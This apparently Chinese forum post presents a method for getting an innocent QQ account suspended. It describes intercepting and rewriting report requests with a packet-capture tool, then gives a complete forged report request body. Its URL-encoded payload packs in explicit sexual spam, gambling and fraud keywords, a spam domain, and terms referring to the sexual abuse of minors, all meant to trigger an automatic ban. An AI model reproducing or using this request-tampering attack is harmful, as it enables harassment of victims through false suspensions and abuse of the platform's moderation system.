某Q无违规冻结漏洞/2024最新QQ点号技术/QQ封号技术

漏洞复现:

​1.在Tim中使用小号向测试账号发送违规词，并使用抓包软件Stream抓出数据，等待发送违规词的小号被检测封禁，然后在修改发送违规词的账号，修改成为测试账号，随后点击提交响应，即可达到无违规封禁该账号

2.在软件Tim中举报测试账号在图片证据中添加一张违规色情图片，在详细描述中添加违规词，随后使用抓包工具Stream修改chatuin开头请求体，把抓取到的chatuin开头数据替换以下数据修改测试账号提交即成功实现封禁七天。

chatuin=8DFC2D337CE4E32F5553E1983DDB000C&chattype=0&groupcode=&topicid=&uinname=&buddyflag=1&impeach_desc=%E6%9D%A5%E4%B8%8B%E6%93%8D%E9%80%BC%E7%A5%9E%E5%99%A8+%E6%97%A0%E5%A5%97%E5%86%85%E5%B0%84+%E5%B9%BC%E5%A5%B3+%E7%A9%BA%E5%A7%90+%E8%87%AA%E5%8A%A8%E5%8C%B9%E9%85%8D+%E7%96%AB%E6%83%85%E4%B8%8D%E6%89%93%E7%83%8A+%E5%BC%80%E8%BD%A6%E4%B8%8A%E9%97%A8%E6%9C%8D%E5%8A%A1+%E8%BF%9B%E5%85%A5%E5%9C%B0%E5%9D%80%3A+7388b.top+%E5%B0%91%E5%A6%87%E7%9C%8B%E4%B8%8A%E5%B0%B1%E6%93%8D%E4%B8%80%E5%AF%B9%E4%B8%80%E7%94%B5%E8%AF%9D%E7%88%B1%E7%88%B1+%E4%BF%9D%E6%AD%A3%E8%83%BD%E7%8E%A9%E4%B8%80%E7%A0%81%E5%BD%92%E4%B8%80%E7%A0%81+%E6%96%97%E5%9C%B0%E4%B8%BB%E4%B8%80%E5%88%86%2B1%E4%B8%8B%E6%B3%A8%E8%B5%8C%E5%8D%9A%E5%85%AD%E5%90%88%E5%BD%A9%E5%BC%80%E5%A5%96%E8%B5%A2%E7%99%BE%E4%B8%87%E5%8E%BB%E7%BC%85%E7%94%B8%E8%AF%88%E9%AA%97&user_input_param=REPORT_IP%3D0%26EVIL_IP%3D0%26BUDDYFLAG%3D1%26MASK%3D0&system=android&version=3.5.5&uintype=1&eviluin=🆔&appname=KQQ&subapp=c2c_chat&salt=550c5c9a3e27cf16b125b50a9d689372&appid=2400002&scene=21000&user_upload_imgs=&evil_type=1&srv_para=chatmsg%253A%255Buin%253🆔%253Bcontent%253D%25E5%2593%25A5%25E5%2593%25A5%253Btype%253D1%255D%255Buin%253D🆔%253Bcontent%253D%25E5%2593%25A5%25E5%2593%25A5%25E4%25B8%258B%25E6%25B3%25A8%25E5%2590%2597%253Btype%253D1%255D%255Buin%253D1565244690%253Bcontent%253D%25E6%259D%25A5%25E4%25B8%258B%25E6%2593%258D%25E9%2580%25BC%25E7%25A5%259E%25E5%2599%25A8%2520%25E6%2597%25A0%25E5%25A5%2597%25E5%2586%2585%25E5%25B0%2584%2520%25E5%25B9%25BC%25E5%25A5%25B3%2520%25E7%25A9%25BA%25E5%25A7%2590%2520%25E8%2587%25AA%25E5%258A%25A8%25E5%258C%25B9%25E9%2585%258D%2520%25E7%2596%25AB%25E6%2583%2585%25E4%25B8%258D%25E6%2589%2593%25E7%2583%258A%2520%25E5%25BC%2580%25E8%25BD%25A6%25E4%25B8%258A%25E9%2597%25A8%25E6%259C%258D%25E5%258A%25A1%2520%25E8%25BF%259B%25E5%2585%25A5%25E5%259C%25B0%25E5%259D%2580%255C%253A%25207388b.top%2520%25E5%25B0%2591%25E5%25A6%2587%25E7%259C%258B%25E4%25B8%258A%25E5%25B0%25B1%25E6%2593%258D%25E4%25B8%2580%25E5%25AF%25B9%25E4%25B8%2580%25E7%2594%25B5%25E8%25AF%259D%25E7%2588%25B1%25E7%2588%25B1%2520%25E4%25BF%259D%25E6%25AD%25A3%25E8%2583%25BD%25E7%258E%25A9%25E4%25B8%2580%25E7%25A0%2581%25E5%25BD%2592%25E4%25B8%2580%25E7%25A0%2581%2520%25E6%2596%2597%25E5%259C%25B0%25E4%25B8%25BB%25E4%25B8%2580%25E5%2588%2586%252B1%25E4%25B8%258B%25E6%25B3%25A8%25E8%25B5%258C%25E5%258D%259A%25E5%2585%25AD%25E5%2590%2588%25E5%25BD%25A9%25E5%25BC%2580%25E5%25A5%2596%25E8%25B5%25A2%25E7%2599%25BE%25E4%25B8%2587%25E5%258E%25BB%25E7%25BC%2585%25E7%2594%25B8%25E8%25AF%2588%25E9%25AA%2597%25E5%2587%25BA%25E5%2594%25AE%25E7%25B2%2589%25E7%25A9%25B4%25E8%2587%25AA%25E5%25BD%2595%25E8%25A7%2586%25E9%25A2%2591%25E6%2592%25B8%25E7%25AE%25A1%25E8%25A7%2586%25E9%25A2%2591%25E4%25BB%25B7%25E6%25A0%25BC28.8%25E5%259D%2597%25E9%2592%25B150%25E9%2583%25A8%25E8%2584%25B1%25E8%25A1%25A3%25E8%25A7%2586%25E9%25A2%2591%25E9%259C%2580%25E8%25A6%2581%25E7%259A%2584%25E8%2581%2594%25E7%25B3%25BB%25E6%2588%2591%25E8%25BF%259B%25E8%25A1%258C%25E8%25B4%25AD%25E4%25B9%25B0%25E5%2592%258C%25E5%258F%2591%25E8%25B4%25A7%2520%25E8%2587%25AA%25E6%2585%25B0%25E4%25B9%25B1%25E4%25BC%25A6%2520%25E6%2592%25B8%25E7%25AE%25A1%2520%25E9%25B8%25A1%25E5%25B7%25B4%25E5%25A4%25A7%25E5%25B1%2581%25E8%2582%25A1%25E5%2590%258E%25E5%2585%25A5%25E5%25B0%258F%25E7%25A9%25B4%2520%25E5%258F%25A3%25E4%25BA%25A4%25E8%2588%2594%25E7%2599%25BD%25E8%2599%258E%25E9%2580%25BC%25E5%2586%2585%25E5%25B0%2584%25E5%25B1%2581%25E7%259C%25BC%2520%25E5%25BC%25BA%25E5%25A5%25B8%25E6%259C%25AA%25E6%2588%2590%25E5%25B9%25B4%253Btype%253D1%255D&ip=1700088864&cryptograph=5D9702938D71E28A80B78933FD3A9369&text_evidence=&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&seqid=8513290096120231203&is_fake=0&uuid=CICLwK4GEAEYqOzuuwkgACjwkOOoBg%3D%3D%0D%0A&strJubaoKeyRetCode=0&impeach_tel=&impeach_tel=&impeach_tel=

代码片段

测试账号:＊＊＊＊＊＊＊

漏洞URL:https://im.qq.com/immobile/index.html?_wv=1025

结果见下图: